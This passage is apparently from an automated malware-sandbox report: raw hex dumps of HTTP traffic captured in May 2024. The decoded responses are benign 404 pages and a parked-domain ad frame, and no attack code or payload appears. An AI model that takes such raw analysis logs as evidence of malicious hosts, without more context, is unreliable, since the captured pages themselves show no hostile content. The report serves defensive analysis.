9a 1d 7f bf 7f fc c3 f6 89 15 e0 c8 2a 77 ef 1f 9f 9f 60 f3 95 e3 87 fb 27 4b 80 dd 28 25 b4 ba f8 f7 0f b7 8f 7f f3 df c7 c7 a7 73 d7 a9 2d e6 3f ab 97 ff 45 4f df fb 85 8c 5a a4 26 c2 10 48 9d 9e d5 cc a5 bf de 7e d6 f1 ca 7f f3 fe 9b 3b 1f e7 fe f1 ed f9 f6 9b fc 87 bf fd d2 e6 d4 d6 c3 fb 1f ab e1 93 7d bd 7d f3 87 fb e7 f5 7c fc b0 cc 40 a1 4a f3 f9 66 15 aa 97 f7 c7 da de 6f de df 7c a7 45 39 c2 56 e7 1b 8f ac bf 39 2a b2 5c 70 08 56 5f 8f 06 ff f6 db 33 b1 b7 7e bb 8e 37 ff ff f9 a9 ad 9a 39 c0 dd fd b3 b5 64 6f a7 af f3 23 2b fa 37 6f d3 eb 9d 9f e6 ca 6f 6e 15 3a c2 40 c8 ec 82 f3 4d 14 38 36 f0 0b 3f de 06 07 4e a6 6e 7d 3d bf ff 70 be 65 37 59 cd 58 15 e7 42 98 32 fb a6 47 72 c0 c8 81 99 ae f3 5d 39 b7 f3 eb a7 e3 87 ed e7 3e 4e 87 02 fe 77 3f b3 70 66 eb ed e7 b6 63 f5 de 71 7f f2 86 6f f9 76 86 20 44 88 d1 7b e5 dd dd dd 99 9c 62 a7 b7 9f 9b 56 42 0d 48 d1 14 38 0a e7 b9 4d 1d e9 43 12 f4 32 e3 26 32 a1 09 07 d7 82 53 7f fb b9 f9 5c 7e f9 57 f9 7c fb 0b 6f fa 09 fe 82 b6 cb 4f f7 c7 9d b6 e0 e6 20 39 bf 6c 8d 80 51 06 c2 52 ff 7c b3 40 31 61 c3 c1 e2 e6 87 7a 43 54 9e 6e 1f ee bf 6b 6a 86 cf 0f e3 90 26 1d 85 82 f6 4b 53 60 9d 5f 40 2c c7 be af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60 61 bc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 30 May 2024 13:04:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: brData Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf 77 ab cf b6 17 0d 94 d8 c5 5e 32 67 14 a9 df 44 31 e1 62 f6 41 da 78 56 3a 36 17 62 8e 0c 37 ef bb e7 e7 0f eb f6 e3 e7 fb 2f 17 67 d2 8f fc 5f 03 5b 7f 7a bf 8f bc f2 f1 fd fa d3 59 7f ce f4 70 fc b6 8e 6f 6f 2f 98 26 37 a7 c5 c7 f7 82 0c 75 50 22 9b c7 d9 b7 b5 fd db fb e7 4d e4 a1 5f 91 a6 9a 1d 7f bf 7f fc c3 f6 89 15 e0 c8 2a 77 ef 1f 9f 9f 60 f3 95 e3 87 fb 27 4b 80 dd 28 25 b4 ba f8 f7 0f b7 8f 7f f3 df c7 c7 a7 73 d7 a9 2d e6 3f ab 97 ff 45 4f df fb 85 8c 5a a4 26 c2 10 48 9d 9e d5 cc a5 bf de 7e d6 f1 ca 7f f3 fe 9b 3b 1f e7 fe f1 ed f9 f6 9b fc 87 bf fd d2 e6 d4 d6 c3 fb 1f ab e1 93 7d bd 7d f3 87 fb e7 f5 7c fc b0 cc 40 a1 4a f3 f9 66 15 aa 97 f7 c7 da de 6f de df 7c a7 45 39 c2 56 e7 1b 8f ac bf 39 2a b2 5c 70 08 56 5f 8f 06 ff f6 db 33 b1 b7 7e bb 8e 37 ff ff f9 a9 ad 9a 39 c0 dd fd b3 b5 64 6f a7 af f3 23 2b fa 37 6f d3 eb 9d 9f e6 ca 6f 6e 15 3a c2 40 c8 ec 82 f3 4d 14 38 36 f0 0b 3f de 06 07 4e a6 6e 7d 3d bf ff 70 be 65 37 59 cd 58 15 e7 42 98 32 fb a6 47 72 c0 c8 81 99 ae f3 5d 39 b7 f3 eb a7 e3 87 ed e7 3e 4e 87 02 fe 77 3f b3 70 66 eb ed e7 b6 63 f5 de 71 7f f2 86 6f f9 76 86 20 44 88 d1 7b e5 dd dd dd 99 9c 62 a7 b7 9f 9b 56 42 0d 48 d1 14 38 0a e7 b9 4d 1d e9 43 12 f4 32 e3 26 32 a1 09 07 d7 82 53 7f fb b9 f9 5c 7e f9 57 f9 7c fb 0b 6f fa 09 fe 82 b6 cb 4f f7 c7 9d b6 e0 e6 20 39 bf 6c 8d 80 51 06 c2 52 ff 7c b3 40 31 61 c3 c1 e2 e6 87 7a 43 54 9e 6e 1f ee bf 6b 6a 86 cf 0f e3 90 26 1d 85 82 f6 4b 53 60 9d 5f 40 2c c7 be af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60 61 bc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 30 May 2024 13:04:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:Data Raw: 31 33 64 35 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:04:41 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:04:44 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:04:46 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:04:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:04:55 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:05:00 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:05:02 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 